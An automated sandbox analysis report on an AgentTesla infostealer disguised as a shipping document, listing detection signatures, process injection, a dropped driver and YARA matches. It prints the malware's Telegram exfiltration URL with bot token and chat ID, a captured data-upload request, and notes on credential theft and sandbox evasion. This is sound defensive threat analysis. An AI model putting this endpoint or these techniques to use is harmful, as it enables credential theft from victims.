Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BL-SHIPPING DOCUMENTS.exe

Overview

General Information

Sample Name:BL-SHIPPING DOCUMENTS.exe
Analysis ID:756203
MD5:69fe54a9cafee09f25e0d3f7a51488c7
SHA1:747373a2640c7fca04258681c7ec313be3b0db24
SHA256:dc72c7525da8aa1afaadaf707499054dd9be20d0c78318d2f63af1fa37d58546
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Sample is not signed and drops a device driver
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Executable has a suspicious name (potential lure to open the executable)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Enables driver privileges
Drops PE files
Creates driver files
Spawns drivers
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates or modifies windows services
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • BL-SHIPPING DOCUMENTS.exe (PID: 6116 cmdline: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe MD5: 69FE54A9CAFEE09F25E0D3F7A51488C7)
    • CasPol.exe (PID: 5312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
SourceRuleDescriptionAuthorStrings
00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x31be8:$a13: get_DnsResolver
      • 0x30301:$a20: get_LastAccessed
      • 0x325f5:$a27: set_InternalServerPort
      • 0x3292a:$a30: set_GuidMasterKey
      • 0x30413:$a33: get_Clipboard
      • 0x30421:$a34: get_Keyboard
      • 0x317bf:$a35: get_ShiftKeyDown
      • 0x317d0:$a36: get_AltKeyDown
      • 0x3042e:$a37: get_Password
      • 0x30f1a:$a38: get_PasswordHash
      • 0x32029:$a39: get_DefaultCredentials
      00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          Click to see the 5 entries
          SourceRuleDescriptionAuthorStrings
          1.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            1.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              1.0.CasPol.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x348d8:$s10: logins
              • 0x34358:$s11: credential
              • 0x30613:$g1: get_Clipboard
              • 0x30621:$g2: get_Keyboard
              • 0x3062e:$g3: get_Password
              • 0x319af:$g4: get_CtrlKeyDown
              • 0x319bf:$g5: get_ShiftKeyDown
              • 0x319d0:$g6: get_AltKeyDown
              1.0.CasPol.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x31de8:$a13: get_DnsResolver
              • 0x30501:$a20: get_LastAccessed
              • 0x327f5:$a27: set_InternalServerPort
              • 0x32b2a:$a30: set_GuidMasterKey
              • 0x30613:$a33: get_Clipboard
              • 0x30621:$a34: get_Keyboard
              • 0x319bf:$a35: get_ShiftKeyDown
              • 0x319d0:$a36: get_AltKeyDown
              • 0x3062e:$a37: get_Password
              • 0x3111a:$a38: get_PasswordHash
              • 0x32229:$a39: get_DefaultCredentials
              No Sigma rule has matched
              Timestamp:192.168.2.5149.154.167.220497054432851779 11/29/22-20:01:10.306536
              SID:2851779
              Source Port:49705
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: BL-SHIPPING DOCUMENTS.exeReversingLabs: Detection: 22%
              Source: BL-SHIPPING DOCUMENTS.exeVirustotal: Detection: 26%Perma Link
              Source: BL-SHIPPING DOCUMENTS.exeJoe Sandbox ML: detected
              Source: 1.0.CasPol.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
              Source: 1.0.CasPol.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage?chat_id=1504449137"}
              Source: CasPol.exe.5312.1.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendMessage"}
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb source: BL-SHIPPING DOCUMENTS.exe
              Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr

              Networking

              barindex
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49705 -> 149.154.167.220:443
              Source: unknownDNS query: name: api.telegram.org
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24475608ceeHost: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://TcwLAp.com
              Source: CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
              Source: CasPol.exe, 00000001.00000002.829202853.000000000634E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.824168793.00000000034D8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000001.00000002.823692783.0000000003476000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://FZsMKmQQms.net
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/1504449137%discordapi%yyy
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument
              Source: CasPol.exe, 00000001.00000002.824079455.00000000034C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
              Source: ?????.sys.0.drString found in binary or memory: https://www.sysinternals.com0
              Source: CasPol.exe, 00000001.00000002.819488007.0000000003151000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: unknownHTTP traffic detected: POST /bot5515611206:AAEcQSX8hXHOAxSYr8KUdLxGF5eqw4FRXoA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad24475608ceeHost: api.telegram.orgContent-Length: 1001Expect: 100-continueConnection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: api.telegram.org
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2

              System Summary

              barindex
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: initial sampleStatic PE information: Filename: BL-SHIPPING DOCUMENTS.exe
              Source: BL-SHIPPING DOCUMENTS.exe, u0036WPvYiAf4rXCUiIeqR/yw3NM9q.csLarge array initialization: get_hii: array initializer size 481808
              Source: 1.0.CasPol.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b7B11A2CAu002d4195u002d4BA6u002d80B6u002d4DED58549CE3u007d/AB3968EDu002d5083u002d4DC4u002d8042u002dAEEF6AA978C6.csLarge array initialization: .cctor: array initializer size 10967
              Source: BL-SHIPPING DOCUMENTS.exeStatic file information: Suspicious name
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 1.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 00000001.00000000.397838302.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: CasPol.exe PID: 5312, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DF928
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062276F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622CF70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622A4C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06225BC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622768E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06225A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622F2E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06223330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0623BE8D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06239330
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0623AF88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062355A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06237F80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06235148
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06260040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06266BA8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06264940
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: No import functions for PE file found
              Source: BL-SHIPPING DOCUMENTS.exe, 00000000.00000000.294039258.00000249F70DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
              Source: BL-SHIPPING DOCUMENTS.exeBinary or memory string: OriginalFilenameTora.exe4 vs BL-SHIPPING DOCUMENTS.exe
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess token adjusted: Load Driver
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeDriver loaded: \Registry\Machine\System\CurrentControlSet\Services\TaskKill
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\?????.sys 440883CD9D6A76DB5E53517D0EC7FE13D5A50D2F6A7F91ECFC863BC3490E4F5C
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: BL-SHIPPING DOCUMENTS.exeReversingLabs: Detection: 22%
              Source: BL-SHIPPING DOCUMENTS.exeVirustotal: Detection: 26%
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exe
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BL-SHIPPING DOCUMENTS.exe.logJump to behavior
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
              Source: ?????.sys.0.drBinary string: \DosDevices\PROCEXP152\ObjectTypes\\Device\PROCEXP152PsAcquireProcessExitSynchronizationPsReleaseProcessExitSynchronizationMmGetMaximumNonPagedPoolInBytesObGetObjectTypeMutantIoCreateDeviceSecureIoValidateDeviceIoControlAccessD:P
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@1/1
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: BL-SHIPPING DOCUMENTS.exe, u0036WPvYiAf4rXCUiIeqR/yw3NM9q.csCryptographic APIs: 'CreateDecryptor'
              Source: 1.0.CasPol.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 1.0.CasPol.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: BL-SHIPPING DOCUMENTS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\Users\Azez\Downloads\JesusIsTheLord\obj\Debug\Tora.pdb source: BL-SHIPPING DOCUMENTS.exe
              Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: ?????.sys.0.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0622CF70 push es; iretd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062218AD push es; ret
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062218BE push es; ret
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062218C5 push es; ret
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_062218CA push es; ret
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06222177 push edi; retn 0000h
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06239283 push esp; ret
              Source: initial sampleStatic PE information: section name: .text entropy: 7.998151218559443

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to behavior
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeFile created: C:\Users\user\AppData\Local\Temp\?????.sysJump to dropped file
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TaskKillJump to behavior
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\BL-SHIPPING DOCUMENTS.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
